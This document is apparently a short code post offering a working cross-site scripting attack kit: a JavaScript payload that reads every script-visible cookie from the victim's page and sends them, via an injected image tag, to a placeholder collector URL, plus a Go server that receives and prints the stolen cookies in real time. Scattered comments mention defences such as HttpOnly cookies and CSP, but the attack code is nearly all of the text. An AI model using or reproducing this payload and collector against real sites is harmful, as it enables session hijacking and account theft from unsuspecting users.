Simple XSS JavaScript payload that calls a specified URL with the list of the victim's cookies. The second file is the Go code used to display, in real time, the cookies of the XSS'ed victims.
// Builds a single string listing every cookie visible to script on this page.
// document.cookie only exposes cookies that were set WITHOUT the HttpOnly flag,
// so marking session cookies HttpOnly is the defence that makes this return nothing useful.
function listCookies() {
// Raw "name=value; name2=value2" string, split into one entry per cookie.
var theCookies = document.cookie.split(';');
var aString = '';
// 1-based counter is purely for display; theCookies[i - 1] is the actual entry.
for (var i = 1; i <= theCookies.length; i++) {
aString += i + ' ' + theCookies[i - 1] + " -- ";
}
return aString;
}
// Exfiltrates `val` by writing an <img> whose src points at the collector host,
// so the browser issues a GET carrying the data in the URL path.
// Defensive notes: a Content-Security-Policy img-src directive limits where
// images may be loaded from, and the outbound request is visible in proxy /
// egress logs as an image fetch to an unexpected host.
function xss_send(val) {
// `val` is concatenated unescaped into the markup and the URL.
document.write("<img src='http://yoururl/" + val + "' />")
}
// Returns the decoded value of the cookie named `c_name`, or null if it is absent.
// Not called anywhere in this listing; only cookies without HttpOnly are reachable.
function getCookie(c_name) {
var c_value = document.cookie;
// Prefer a match preceded by a space (i.e. not the first cookie), then fall back
// to a match at the start of the string.
var c_start = c_value.indexOf(" " + c_name + "=");
if (c_start == -1) {
c_start = c_value.indexOf(c_name + "=");
}
if (c_start == -1) {
c_value = null;
} else {
// Value runs from just after '=' to the next ';' (or end of string).
c_start = c_value.indexOf("=", c_start) + 1;
var c_end = c_value.indexOf(";", c_start);
if (c_end == -1) {
c_end = c_value.length;
}
// unescape() is a legacy decoder; decodeURIComponent is the modern equivalent.
c_value = unescape(c_value.substring(c_start, c_end));
}
return c_value;
}
// Entry point: runs as soon as the script executes in the victim page,
// sending the full cookie list to the collector in one request.
xss_send(listCookies());
package main
import (
"net/http"
"fmt"
)
// main starts the collector: every request under /xss/ is handed to viewHandler
// and the server listens on all interfaces on port 8080.
func main(){
http.HandleFunc("/xss/", viewHandler)
// The error from ListenAndServe is discarded, so a failed bind exits silently;
// the server also has no read/write timeouts set.
http.ListenAndServe(":8080", nil)
}
// viewHandler prints the part of the request path after "/xss/" to stdout.
// r.URL.Path is the already-decoded path, so whatever the client sent is
// written verbatim with no validation or escaping. Nothing is written to w,
// so the client receives an empty 200 response.
func viewHandler(w http.ResponseWriter, r *http.Request){
title := r.URL.Path[len("/xss/"):]
fmt.Println(title)
}